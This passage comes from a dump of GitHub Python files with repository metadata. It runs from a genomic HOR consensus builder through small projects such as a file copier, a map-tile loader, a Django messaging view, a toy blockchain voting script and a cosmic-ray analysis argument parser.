aln[\"matched_aligned\"][i] == \"|\":\n cur_len += 1\n else:\n if cur_len > longest:\n longest, longest_ind = cur_len, i - cur_len\n cur_len = 0\n if cur_len > longest:\n longest, longest_ind = cur_len, len(aln[\"matched_aligned\"]) - cur_len\n i, j = len(p1) - max_len + len(aln[\"query_aligned\"][:longest_ind].replace(\"-\", \"\")), len(aln[\"target_aligned\"][:longest_ind].replace(\"-\", \"\"))\n\n if log is None:\n print(i, j, ed, len(p1[:i] + p2[j:]))\n print(\"\")\n else:\n log.info(\"i=\" + str(i) + \"; j=\" + str(j) +\"; edit dist=\" + str(ed) + \"; pair union len=\" + str(len(p1[:i] + p2[j:])), indent=3)\n return i, j\n\ndef build_monoconsensus(monodec, ref, step, clustal_dir, log=None):\n mappings = {}\n for i in range(len(monodec)):\n m_name, m_s, m_e, m_idnt = monodec[i][1], int(monodec[i][2]), int(monodec[i][3]), float(monodec[i][4])\n if m_idnt > MONOIDNT:\n if m_name not in mappings:\n mappings[m_name] = []\n if monodec[i][5] == \"+\":\n mappings[m_name].append(make_record(ref[monodec[i][0]].seq[max(0, m_s - step): min(m_e + step, len(ref[monodec[i][0]].seq) )], m_name + str(m_s), m_name + str(m_s)))\n else:\n mappings[m_name].append(make_record(ref[monodec[i][0]].seq[max(0, m_s - step): min(m_e + step, len(ref[monodec[i][0]].seq) )].reverse_complement(), m_name + str(m_s) + \"_rev\", m_name + str(m_s) + \"_rev\"))\n m_consensus = []\n for m in mappings:\n if log != None:\n log.info(\"Detecting monoconsensus for \" + m, indent=1)\n else:\n print(m)\n consensus = align_mappings(mappings[m], clustal_dir, m)\n consensus = consensus[step : len(consensus)-step]\n cur_consensus = make_record(Seq(consensus), m, m)\n m_consensus.append(cur_consensus)\n return m_consensus\n\ndef build_pairconsensus(hors, monodec, ref, clustal_dir, log=None):\n if log is not None:\n log.info(\"\\n= Build Pair Consensus =\", indent=1)\n\n hors_seq = []\n for hor_desc in hors:\n hor = hor_desc[1]\n pairs_consensus = []\n for i in range(len(hor)):\n m1, m2 = hor[i], hor[(i+1)%len(hor)]\n mappings = []\n for j in range(len(monodec)-1):\n if ((monodec[j][1] == m1 and monodec[j+1][1] == m2 and monodec[j][5] == monodec[j+1][5] == \"+\") or\\\n (monodec[j][1] == m2 and monodec[j+1][1] == m1 and monodec[j][5] == monodec[j+1][5] == \"-\")) \\\n and float(monodec[j][4]) > MONOIDNT and float(monodec[j+1][4]) > MONOIDNT:\n s1, e1, s2, e2 = int(monodec[j][2]), int(monodec[j][3]), int(monodec[j+1][2]), int(monodec[j+1][3])\n if s2 - e1 < 10:\n if monodec[j][5] == \"+\":\n mappings.append(make_record(ref[monodec[j][0]].seq[s1: e2], m1+\"_\" + m2 + str(s1), m1 + \"_\" +m2 + str(s1) ))\n else:\n mappings.append(make_record(ref[monodec[j][0]].seq[s1: e2].reverse_complement(), m1+\"_\" + m2 + str(s1) + \"_rev\", m1 + \"_\" +m2 + str(s1) + \"_rev\" ))\n\n if log is None:\n print(\"pair: \", m1, m2, len(mappings))\n else:\n log.info(\"# pairs(\" + m1 + \", \" + m2 + \") = \" + str(len(mappings)), indent=2)\n\n if len(mappings) > 0:\n pairs_consensus.append(align_mappings(mappings, clustal_dir, m1+\"_\" + m2))\n\n if len(pairs_consensus) > 0:\n cur_consensus = \"\"\n border = []\n for i in range(len(pairs_consensus)):\n if log is None:\n print(\"Pair \", i)\n else:\n log.info(\"Handle pair #\" + str(i), indent=2)\n border.append(glue_pairs(pairs_consensus[i], pairs_consensus[(i+1)%len(pairs_consensus)], log))\n\n l, r = border[len(pairs_consensus)-1][1], 0\n for i in range(len(pairs_consensus)):\n r = border[i][0]\n if l > r:\n if log is None:\n print(\"Something went wrong!\", i, l, r)\n exit(-1)\n else:\n log.error(\"Something went wrong! \" + str(i) + \" \" + str(l) + \" \" + str(r))\n\n cur_consensus += pairs_consensus[i][l: r]\n l = border[i][1]\n\n if log is None:\n print(len(cur_consensus))\n else:\n log.info(\"\\n\")\n log.info(\"HOR consensus len=\" + str(len(cur_consensus)), indent=2)\n\n hors_seq.append(make_record(Seq(cur_consensus), hor_desc[0], hor_desc[0], str(len(cur_consensus)) + \"bp \" + \",\".join(hor) ))\n else:\n hors_seq.append(make_record(Seq(\"\"), hor_desc[0], hor_desc[0], str(0) + \"bp \" + \",\".join(hor) ))\n return hors_seq\n\n\ndef run(sequences, monomers, num_threads, out_file, log=None):\n if log is not None:\n log.info(\"Run StringDecomposer\", indent=2)\n utils.sys_call([sd_run, sequences, monomers, \"-t\", str(num_threads), \"--out-file\", out_file])\n with open(out_file + \".tsv\", 'r') as f:\n out_decomposition = \"\".join(f.readlines())\n return out_decomposition\n\n\ndef divide_into_monomers(hors_lst, hors, monomers, horfile, monofile, outtsv, log=None):\n if log is not None:\n log.info(\"\\n= Divide into monomers =\", indent=1)\n hors_res, res, bed = [], [], []\n for i in range(len(hors)):\n h, start_mono, hor_len = hors[i], hors_lst[i][1][0], len(hors_lst[i][1])\n if len(h.seq) > 0:\n triple_hors = []\n triple_hors.append(make_record(h.seq + h.seq + h.seq, h.id, h.name, h.description))\n save_fasta(horfile, triple_hors)\n decomposition = run(horfile, monofile, \"1\", outtsv[:-len(\".tsv\")], log)\n inHOR, start_shift = False, 0\n newhor_seq = Seq(\"\")\n\n if log is None:\n print(start_mono, hor_len, len(h.seq))\n else:\n log.info(\"Start monomer=\" + str(start_mono) + \", HOR len(#mon)=\" + str(hor_len) + \", HOR len(bp)=\" + str(len(h.seq)), indent=2)\n\n mono_num = 0\n for ln in decomposition.split(\"\\n\")[1:-1]:\n ref, mono, start, end, score = ln.split(\"\\t\")[:5]\n if mono == start_mono:\n inHOR, start_shift = True, int(start)\n if log is None:\n print(\"shift\", start_shift)\n else:\n log.info(\"Start monomer shift=\" + str(start_shift), indent=2)\n\n if inHOR and mono_num < hor_len:\n if log is None:\n print(mono, ref + \":\" + str(int(start) - start_shift) + \"-\" + str(int(end) + 1 - start_shift), len(res) )\n else:\n log.info(\"Monomer# \" + str(len(res)) + \": \" + mono + \" \" + ref + \":\" + str(int(start) - start_shift) + \"-\" + str(int(end) + 1 - start_shift), indent=2)\n mono_num += 1\n res.append(make_record(triple_hors[0].seq[int(start): int(end) + 1], mono, mono, ref + \":\" + str(int(start) - start_shift) + \"-\" + str(int(end) + 1 - start_shift) ))\n r, g, b = random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)\n bed.append(\"\\t\".join([ref, str(int(start) - start_shift), str(int(end) + 1 - start_shift), mono, str(int(float(score))), \"+\", str(int(start) - start_shift), str(int(end) + 1 - start_shift), \",\".join([str(r), str(g), str(b)]) ]))\n newhor_seq += triple_hors[0].seq[int(start): int(end) + 1]\n\n hors_res.append(make_record(newhor_seq, h.id, h.id, str(len(newhor_seq)) + \"bp \" + \",\".join(hors_lst[i][1]) ))\n return hors_res, res, bed\n\n\ndef getHORconsensus(hors_tsv, monodec, ref, consensus, mono_outfilename, outdir, log=None):\n hors = load_horascycle(hors_tsv, log)\n hor_consensus = build_pairconsensus(hors, monodec, ref, os.path.join(outdir, \"clustal_alns\"), log=log)\n\n if len(hor_consensus) > 0:\n hor_outfilename = os.path.join(outdir, \"hor_consensus.fasta\")\n hor_consensus_shifted, pair_monomers, bed = divide_into_monomers(hors, hor_consensus, consensus,\n hor_outfilename, mono_outfilename,\n os.path.join(outdir, \"sd.tsv\"), log)\n hor_outfilename = os.path.join(outdir, \"hor_consensus.fasta\")\n save_fasta(hor_outfilename, hor_consensus_shifted)\n\n if log is not None:\n log.info(\"HOR consensus can be found\" + hor_outfilename, indent=1)\n else:\n print(\"HOR consensus can be found\", hor_outfilename)\n\n pmono_outfilename = os.path.join(outdir, \"monomer_paired_consensus.fasta\")\n save_fasta(pmono_outfilename, pair_monomers)\n\n if log is not None:\n log.info(\"Paired monomer consensus can be found \" + pmono_outfilename, indent=1)\n else:\n print(\"Paired monomer consensus can be found\", pmono_outfilename)\n\n\n outfilename = os.path.join(outdir, \"monomer_paired_consensus.bed\")\n with open(outfilename, \"w\") as fout:\n for ln in bed:\n fout.write(ln + \"\\n\")\n\n if log is not None:\n log.info(\"Paired monomer consensus bed can be found \" + outfilename, indent=1)\n else:\n print(\"Paired monomer consensus bed can be found\", outfilename)\n else:\n print(\"Paired wasn't generated - no pairs found\")\n\n\ndef build_horcons(sepath, bedfile, odir, horspath, extend=4, seed=123, log=None):\n random.seed(int(seed))\n ref = load_fasta(sepath, \"map\")\n\n if not os.path.exists(odir):\n os.makedirs(odir)\n\n mono_outfilename = os.path.join(odir, \"monomer_consensus.fasta\")\n monodec, monomers = load_bedfile(bedfile)\n consensus = build_monoconsensus(monodec, ref, int(extend), os.path.join(odir, \"clustal_alns\"), log=log)\n save_fasta(mono_outfilename, consensus)\n\n if log is not None:\n log.info(\"\\nMonomer consensus can be found \" + mono_outfilename, indent=1)\n else:\n print(\"Monomer consensus can be found \", mono_outfilename)\n\n if horspath != None:\n getHORconsensus(horspath, monodec, ref, consensus, mono_outfilename, odir, log=log)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Extracts monomer/HOR consensus from annotation')\n parser.add_argument('sequences', help='fasta-file with annotated sequences')\n parser.add_argument('annotation', help='bed-file with annotation')\n parser.add_argument('outdir', help='output directory')\n parser.add_argument('--hors', help='tsv-file with HOR description', required=False)\n parser.add_argument('--extend', help='number of bp to extend monomer alignment', default=4, required=False)\n parser.add_argument('--seed', help='seed for colors generation in bed-files', default=123, required=False)\n args = parser.parse_args()\n\n build_horcons(args.sequences, args.annotation, args.outdir, args.hors, args.extend, args.seed)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ablab/HORmon","sub_path":"HORmon/build_horconsensus.py","file_name":"build_horconsensus.py","file_ext":"py","file_size_in_byte":16651,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"28628382076","text":"from multiprocessing.dummy import Pool\r\nimport os\r\nimport shutil\r\nimport argparse\r\n\r\nargParser = argparse.ArgumentParser()\r\nargParser.add_argument(\"-s\", \"--src\", help=\"root path to copy from\", required=True)\r\nargParser.add_argument(\"-d\", \"--dst\", help=\"root path to copy to\", required=True)\r\nargParser.add_argument(\"-t\", \"--threads\", help=\"number of parallel threads\", default=4, type=int)\r\n\r\n\r\ndef copy_or_down(src, dst):\r\n if not os.path.exists(dst):\r\n if os.path.isdir(src):\r\n try:\r\n shutil.copytree(src, dst)\r\n except Exception as e:\r\n print(f'failed to copy tree: {e}')\r\n else:\r\n try:\r\n if os.path.isfile(src):\r\n shutil.copy(src, dst)\r\n except Exception as e:\r\n print(f'failed to copy file: {e}')\r\n else:\r\n if os.path.isdir(src):\r\n for child in os.listdir(src):\r\n copy_or_down(os.path.join(src, child), os.path.join(dst, child))\r\n\r\n\r\ndef try_multiple_threads(src, dst, fldrs):\r\n for fldr in fldrs:\r\n copy_or_down(os.path.join(src, fldr), os.path.join(dst, fldr))\r\n\r\n\r\ndef main():\r\n args = argParser.parse_args()\r\n\r\n if not os.path.exists(args.src):\r\n raise FileNotFoundError(f'cannot find src path {args.src}')\r\n\r\n if not os.path.exists(args.dst):\r\n raise FileNotFoundError(f'cannot find dst path {args.dst}')\r\n\r\n fldrs = os.listdir(args.src)\r\n\r\n if args.threads == 1:\r\n try_multiple_threads(args, fldrs)\r\n else:\r\n with Pool(args.threads) as p:\r\n p.starmap(try_multiple_threads, [(args.src, args.dst, fldr) for fldr in fldrs])\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Bonsa11/overseer_mover","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40827093607","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 22 20:15:32 2016\n\n@author: wang_wei52\n\"\"\"\n\n\nimport pandas as pd\nfrom sklearn import linear_model\n\n\ndef get_data(filename):\n data = pd.read_csv(filename)\n x_parameter = []\n y_parameter = []\n for single_square_feet, single_price_value in zip(data['square_feet'], data['price']):\n x_parameter.append([float(single_square_feet)])\n y_parameter.append(float(single_price_value))\n return x_parameter, y_parameter\n\n\ndef linear_model_main(x_parameters, y_parameters):\n # create linear regression object\n regression = linear_model.linearRegression()\n regression.fit(x_parameters, y_parameters)\n\n","repo_name":"Jamesmarswang/Python","sub_path":"MLDemo/StudyDemo/predict_hourse_price.py","file_name":"predict_hourse_price.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27968648820","text":"# -*- coding: utf-8 -*-\n\"\"\"\nProvides entry point main(argv) when running from the command line.\n\nCreated on Sat Jul 9 12:45:39 2016\n\n@author: Aaron Beckett\n\"\"\"\n\nimport os\nimport argparse\n\nimport ctip.commands as cmd\n\n# Version information (parsed by setup.py\n__version__ = \"0.1.1\"\n\n# Get help text from file in docs folder\nwith open(\"docs\" + os.path.sep + \"help_message.txt\") as f:\n help_text = f.read()\n\n\ndef main(argv):\n\n # If the user just runs 'ctip' then print the help message\n if (len(argv) == 1):\n print(help_text)\n exit(0)\n\n # Create the command line parser\n parser = create_cli_parser()\n\n # Parse the command line arguments with the parser\n args = parser.parse_args(argv[1:])\n\n # Call the correct function\n args.func(args)\n\n\ndef create_cli_parser():\n \"\"\"Create CTIP ArgumentParser.\"\"\"\n parser = argparse.ArgumentParser()\n\n subparsers = parser.add_subparsers()\n parser_run = subparsers.add_parser('run')\n parser_check = subparsers.add_parser('check')\n parser_stop = subparsers.add_parser('stop')\n parser_clean = subparsers.add_parser('clean')\n parser_set = subparsers.add_parser('set')\n parser_env = subparsers.add_parser('env')\n parser_tables = subparsers.add_parser('tables')\n parser_list = subparsers.add_parser('list')\n parser_update = subparsers.add_parser('update')\n parser_log = subparsers.add_parser('log')\n\n # run\n parser_run.add_argument('experiment')\n parser_run.add_argument('-f', '--genfile', required=True)\n parser_run.add_argument('-n', '--name', required=True)\n parser_run.add_argument('-e', '--env')\n parser_run.set_defaults(func=cmd.run)\n\n # check\n parser_check.add_argument('session_id', type=int, nargs='?')\n parser_check.set_defaults(func=cmd.check)\n\n # stop\n parser_stop.add_argument('session_id', type=int, nargs='?')\n parser_stop.set_defaults(func=cmd.stop)\n\n # clean\n parser_clean.add_argument('session_id', type=int, nargs='?')\n parser_clean.set_defaults(func=cmd.clean)\n\n # set\n subparsers_set = parser_set.add_subparsers()\n parser_set_exp = subparsers_set.add_parser('experiment-dir')\n parser_set_env = subparsers_set.add_parser('environment-dir')\n # set experiment-dir\n parser_set_exp.add_argument('dir')\n parser_set_exp.set_defaults(func=cmd.set_experiment_dir)\n # set environment-dir\n parser_set_env.add_argument('dir')\n parser_set_env.set_defaults(func=cmd.set_environment_dir)\n\n # env\n parser_env.add_argument('keyval')\n parser_env.set_defaults(func=cmd.set_ctip_env_variable)\n\n # tables\n parser_tables.set_defaults(func=cmd.tables)\n\n # list\n parser_list.add_argument('table_name')\n parser_list.add_argument('where_clause', nargs='*')\n parser_list.set_defaults(func=cmd.list)\n\n # update\n subparsers_update = parser_update.add_subparsers()\n parser_update_status = subparsers_update.add_parser('status')\n parser_update_id = subparsers_update.add_parser('id')\n # update status\n parser_update_status.add_argument('job_id')\n parser_update_status.add_argument('new_status')\n parser_update_status.set_defaults(func=cmd.update_status)\n # update id\n parser_update_id.add_argument('job_id')\n parser_update_id.add_argument('new_id')\n parser_update_id.set_defaults(func=cmd.update_id)\n\n # log\n subparsers_log = parser_log.add_subparsers()\n parser_log_start = subparsers_log.add_parser('start')\n parser_log_pause = subparsers_log.add_parser('pause')\n parser_log_resume = subparsers_log.add_parser('resume')\n parser_log_end = subparsers_log.add_parser('end')\n parser_log.add_argument('job_id')\n # log start\n parser_log_start.set_defaults(func=cmd.log_start)\n # log pause\n parser_log_pause.set_defaults(func=cmd.log_pause)\n # log resume\n parser_log_resume.set_defaults(func=cmd.log_resume)\n # log end\n parser_log_end.set_defaults(func=cmd.log_end)\n\n return parser","repo_name":"arockett/ctip","sub_path":"ctip/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8649399770","text":"import itertools as it\nimport logging\nimport operator\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Iterable, Iterator, Protocol\n\nfrom ..cli_utils import wrap_main\nfrom ..io_utils import get_stripped_lines\nfrom ..logs import setup_logging\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass InterpreterState:\n x: int = 1\n\n\nclass Instruction(Protocol):\n def __call__(self, state: InterpreterState) -> Iterable[None]:\n ...\n\n\nclass Noop:\n def __call__(self, state: InterpreterState) -> Iterable[None]:\n yield\n\n\n@dataclass\nclass AddX:\n increment: int\n\n def __call__(self, state: InterpreterState) -> Iterable[None]:\n yield\n yield\n state.x += self.increment\n\n\ndef parse_instruction(line: str) -> Instruction:\n if line == \"noop\":\n return Noop()\n elif line.startswith(\"addx\"):\n name, value_str = line.split(\" \")\n return AddX(increment=int(value_str))\n else:\n raise ValueError(f\"Unknown instruction {line}\")\n\n\ndef load_program(filename: Path) -> list[Instruction]:\n return [parse_instruction(line) for line in get_stripped_lines(filename)]\n\n\nclass Interpreter:\n current_instruction: Instruction\n current_op: Iterator[None]\n\n def __init__(self, program: list[Instruction]) -> None:\n self.state = InterpreterState()\n logger.debug(\"Intializing interpreter with state %s\", self.state)\n self.instructions = it.cycle(program)\n self.shift_instruction()\n\n def shift_instruction(self) -> None:\n self.current_instruction = next(self.instructions)\n self.current_op = iter(self.current_instruction(self.state))\n logger.info(\"Shifted to instruction %s\", self.current_instruction)\n\n def step(self) -> None:\n logger.debug(\n \"Stepping with state %s @ %s\", self.state, self.current_instruction\n )\n try:\n next(self.current_op)\n except StopIteration:\n logger.debug(\"Instruction %s finished\", self.current_instruction)\n self.shift_instruction()\n next(self.current_op)\n else:\n logger.debug(\n \"Stepped with state %s @ %s\", self.state, self.current_instruction\n )\n\n def run(self, cycles: int) -> Iterable[int]:\n for _ in range(cycles):\n self.step()\n yield self.state.x\n\n\n@wrap_main\ndef main(filename: Path) -> str:\n program = load_program(filename)\n interpreter = Interpreter(program)\n states = interpreter.run(220)\n cycles = it.count(1)\n cycle_state = zip(states, cycles)\n interesting: Iterable[tuple[int, int]] = it.islice(cycle_state, 19, None, 40)\n interesting = list(interesting)\n logger.info(\"Interesting states: %s\", interesting)\n signal_strengths = it.starmap(operator.mul, interesting)\n total = sum(signal_strengths)\n return str(total)\n\n\nif __name__ == \"__main__\":\n setup_logging()\n main()\n","repo_name":"kurazu/advent_of_code_2022","sub_path":"advent/day_10/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35468086453","text":"from cars.forms import MessageForm\nfrom cars.models import Messages, Cars\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom django.http import HttpResponseNotFound\nfrom django.shortcuts import render, redirect\n\n\n# id user, id makine, useragent, ip, daten\ndef Index(request, username=None):\n if username:\n other_user = User.objects.filter(username=username).first()\n\n if not other_user:\n return HttpResponseNotFound(\"User not found\")\n\n # mesazhe te cilat na kane ardhur nga sender\n # mesazhet qe ne i kemi derguar senderit\n messages = Messages.objects \\\n .filter(Q(sender=other_user, recipient=request.user) | Q(sender=request.user, recipient=other_user)) \\\n .order_by('id')\n else:\n messages = []\n\n user_ids = Messages.objects.filter(recipient=request.user).values('sender').distinct()\n bisedat = User.objects.filter(id__in=user_ids)\n form = MessageForm()\n\n return render(request, 'messages/index.html', {\n \"messages\": messages,\n \"bisedat_user\": bisedat,\n \"username\": username,\n 'form': form\n })\n\n\ndef SendMessage(request, username):\n recipient = User.objects.filter(username=username).first()\n\n if not recipient:\n return None # 404 ketu\n\n form = MessageForm(request.POST)\n if form.is_valid():\n message = form.save(commit=False)\n message.sender = request.user\n message.recipient = recipient\n message.save()\n\n return redirect('messages_from_user', username)\n","repo_name":"G3nt1/Car_storeMarket","sub_path":"cars/views/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27606469993","text":"import urllib.request\nfrom PIL import Image\nimport io\nimport concurrent.futures\n\ndef imageFor(base_url, bbox_lon0, bbox_lat0, bbox_lon1, bbox_lat1, img_width, img_height, degrees_per_tile, max_tiles):\n #Linearly map a->b\n def mapcoord(a0,a1,b0,b1,b2):\n da=a1-a0\n db=b1-b0\n l=(b2-b0)/db\n return a0+l*da\n\n #Calculate the image size and size fo each tile to get the required degrees/tile\n def setup(bbox_lon0, bbox_lat0, bbox_lon1, bbox_lat1, img_width, img_height, degrees_per_tile):\n\n dlon=bbox_lon1-bbox_lon0\n dlat=bbox_lat1-bbox_lat0\n\n #Need at least one dimension\n if img_width==0 and img_height==0: return False\n\n if img_width==0:\n degrees_per_pixel=dlat/img_height\n img_width=int(dlon/degrees_per_pixel)\n elif img_height==0:\n degrees_per_pixel=dlon/img_width\n img_height=int(dlat/degrees_per_pixel)\n else:\n degrees_per_pixel=max(dlon/img_width, dlat/img_height)\n\n tilesize=int(degrees_per_tile/degrees_per_pixel)\n #print('W='+str(img_width)+'H='+str(img_height)+'T='+str(tilesize))\n largest_dim = img_width if img_width>img_height else img_width\n if tilesize>largest_dim*2: tilesize=largest_dim*2\n if tilesize<20: tilesize=20\n #print(str(tilesize))\n return (img_width, img_height, tilesize)\n\n #Parallelisable routine to load tile and save its position in the image\n def loadtile(tilespec, timeout):\n with urllib.request.urlopen(tilespec['url']) as req:\n f = io.BytesIO(req.read())\n tileimg = Image.open(f)\n return {'tileimg':tileimg,'pos':tilespec['pos']}\n\n #Setup configuration\n if degrees_per_tile==0: degrees_per_tile=99999999999 #Just load one single fullsize (square) image\n (Width,Height,TileSize)=setup(bbox_lon0, bbox_lat0, bbox_lon1, bbox_lat1, img_width, img_height, degrees_per_tile)\n\n #Iterate over all tiles and create url requests\n tilespecs=[] #url and x,y position in final image\n for x in range(0,Width,TileSize):\n for y in range(0,Height,TileSize):\n bblon0=mapcoord(bbox_lon0,bbox_lon1,0,Width,x)\n bblon1=mapcoord(bbox_lon0,bbox_lon1,0,Width,x+TileSize)\n bblat0=mapcoord(bbox_lat0,bbox_lat1,0,Height,y)\n bblat1=mapcoord(bbox_lat0,bbox_lat1,0,Height,y+TileSize)\n bbox=str(bblon0)+\",\"+str(bblat0)+\",\"+str(bblon1)+\",\"+str(bblat1)\n url=base_url+\"&SERVICE=WMS&VERSION=1.1.1&REQUEST=GetMap&BBOX=\"+bbox+\"&SRS=EPSG:27700&WIDTH=\"+str(TileSize)+\"&HEIGHT=\"+str(TileSize)+\"&format=image%2Fpng\"\n #print(url)\n tilespecs.append({'url':url,'pos':(x, Height-TileSize-y)})\n\n #Short circuit if we are about to ask the server for too many tiles\n if len(tilespecs)>max_tiles: return False\n\n #Create workers to load each tile\n tileobjs=[]\n with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:\n future_to_url = {executor.submit(loadtile, tilespec, 60): tilespec['url'] for tilespec in tilespecs}\n for future in concurrent.futures.as_completed(future_to_url):\n try:\n tileobj = future.result()\n except Exception as exc:\n print('%r generated an exception: %s' % (future_to_url[future], exc))\n else:\n tileobjs.append(tileobj)\n\n #Combine the tiles into the final image\n img=Image.new(\"RGBA\",(Width,Height))\n for tileobj in tileobjs:\n img.paste(tileobj['tileimg'],tileobj['pos'])\n return img\n\n","repo_name":"DuncanRowland/EasyMap_Shim","sub_path":"loadimage.py","file_name":"loadimage.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35782630926","text":"from blockchains import Blockchain\n\ndef main():\n chain1=Blockchain()\n chain2=Blockchain()\n \n \n\n candidate1=input('Enter first candidate name')\n candidate2=input('Enter second candidate name')\n cand1_votes=0\n cand2_votes=0\n voters_id=[101,102,103,104,105,106]\n no_of_voters=len(voters_id)\n print('no of voters:',no_of_voters)\n voted=[]\n while True:\n if voters_id==[]:\n print('voting is over')\n if cand1_votes>cand2_votes:\n print(f\"{candidate1} won the election with {cand1_votes}\")\n print('AND THE VOTES FOR {candidate1} ARE:')\n chain1.print_blockchain()\n elif cand2_votes>cand1_votes:\n print(f\"{candidate2} won the election with {cand2_votes}\")\n print('AND THE VOTES FOR {candidate2} ARE:')\n chain2.print_blockchain()\n elif cand1_votes==cand2_votes:\n print('tied!!')\n chain1.print_blockchain()\n chain2.print_blockchain()\n break\n else:\n voter=int(input('Enter your Id:'))\n if voter in voted:\n print('you already voted')\n else:\n if voter in voters_id:\n \n print(f\"1.{candidate1}\\n2.{candidate2}\")\n choice=int(input('Enter your choice'))\n if choice==1:\n chain1.add_block(voter)\n cand1_votes+=1\n print(f\"you voted {candidate1}\")\n elif choice==2:\n chain2.add_block(voter)\n cand2_votes+=1\n print(f\"you voted {candidate2}\")\n voters_id.remove(voter)\n voted.append(voter)\n else:\n print('you are not allowed to vote')\nif __name__ == '__main__':\n\tmain()","repo_name":"Saiber440/Voting-Backend","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"117556451","text":"if __name__ == '__main__':\n n = int(raw_input())\n student_marks = {}\n student_avg = {}\n for _ in range(n):\n line = raw_input().split()\n name, scores = line[0], line[1:]\n #print(scores)\n scores = map(float, scores)\n #print(scores)\n student_marks[name] = scores\n student_avg[name] = sum(scores)/len(scores)\n query_name = raw_input()\n print(\"{:.2f}\".format(student_avg[query_name]))","repo_name":"Rameshganesan/Mypython","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24063578511","text":"class Shopping:\n def __init__(self,name):\n self.name = name\n self.cart = []\n # this cart is instance attribute\n\n def add_to_cart(self,item_name, price, quantity):\n # ekta product dictionary banabo\n product = {'item' : item_name, 'price': price, 'quantity':quantity}\n self.cart.append(product)\n\n isRemoved = False\n def remove_item(self,item_name):\n for things in self.cart:\n if things['item'] == item_name:\n self.isRemoved = True\n self.cart.remove(things)\n\n\n\n def checkOut(self,amount):\n total = 0\n for things in self.cart:\n total = total + (things['quantity'] * things['price'])\n print (f'Your Total Bill is : {total}')\n\n print(f'You Have Given {amount} tk')\n if amount < total:\n print(f'Sir, Please Provide {total-amount} tk More')\n else:\n if self.isRemoved:\n print(f\"item removed successfully\")\n print(f\"Here's your products and Change {amount-total} tk\")\n\n\nmoshiur = Shopping(\"Moshiuzzaman\")\nmoshiur.add_to_cart('Alu',50,6)\nmoshiur.add_to_cart('Onion',70,5)\nmoshiur.add_to_cart('Chille',140,1)\nmoshiur.add_to_cart(\"Ice-Cream\",1,50)\nmoshiur.remove_item('Ice-Cream')\n\n\nprint()\nprint(f'{moshiur.name} is purchasing : ')\nprint('******************************')\n\n\nmoshiur.checkOut(1000)\n# for things in moshiur.cart:\n # print(f\"{things['item']} -------- {things['quantity']} -------- {things['price']}\")\n","repo_name":"arafat-yasin-2413/PYTHON_and_OOP","sub_path":"WEEK -2/Mod 5/6_shopping_practice.py","file_name":"6_shopping_practice.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"783318000","text":"import argparse\n\nimport numpy as np\n\nfrom train import test_seed, f_sampler\n\ncline_parser = argparse.ArgumentParser(description='Calculate minimal detectable fraction',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n\ndef add_arg(*pargs, **kwargs):\n cline_parser.add_argument(*pargs, **kwargs)\n\n\nadd_arg('--f_src', type=float, help='fraction of \"from-source\" EECRs [0,1] or -1 for random', default=-1)\nadd_arg('--Neecr', type=int, help='Total number of EECRs in each sample', default=500)\nadd_arg('--Emin', type=int, help='Emin in EeV for which the input sample was generated', default=28)\nadd_arg('--EminData', type=float, help='minimal data energy in EeV', default=56)\n# add_arg('--source_id', type=str,\n# help='source (CenA, NGC253, M82, M87 or FornaxA) or comma separated list of sources or \"all\"',\n# default='CenA')\nadd_arg('sources', type=str, nargs='+', metavar='source', default=[])\nadd_arg('--fractions', type=float, nargs='+', metavar='frac', help='fractions for mixed source case (in the same order as sources)', default=[])\nadd_arg('--Nside', type=int, help='healpix grid Nside parameter', default=32)\nadd_arg('--Nini', type=int, help='Size of the initial sample of from-source events', default=10000)\nadd_arg('--source_vicinity_radius', type=str, help='source vicinity radius', default='1')\nadd_arg('--log_sample', action='store_true', help=\"sample f_src uniformly in log scale\")\nadd_arg('--f_src_max', type=float, help='maximal fraction of \"from-source\" EECRs [0,1]', default=1)\nadd_arg('--f_src_min', type=float, help='minimal fraction of \"from-source\" EECRs [0,1]', default=0)\nadd_arg('--model', type=str, help='healpix NN', default='')\nadd_arg('--n_samples', type=int, help='number of samples', default=50000)\nadd_arg('--alpha', type=float, help='type 1 maximal error', default=0.01)\nadd_arg('--beta', type=float, help='type 2 maximal error', default=0.05)\nadd_arg('--suffix', type=str, default='*')\nadd_arg('--batch_size', type=int, help='size of training batch', default=100)\nadd_arg('--mf', type=str, help='Magnetic field model (jf or pt)', default='jf')\nadd_arg('--data_dir', type=str, help='data root directory (should contain jf/sources/ or pt/sources/)',\n 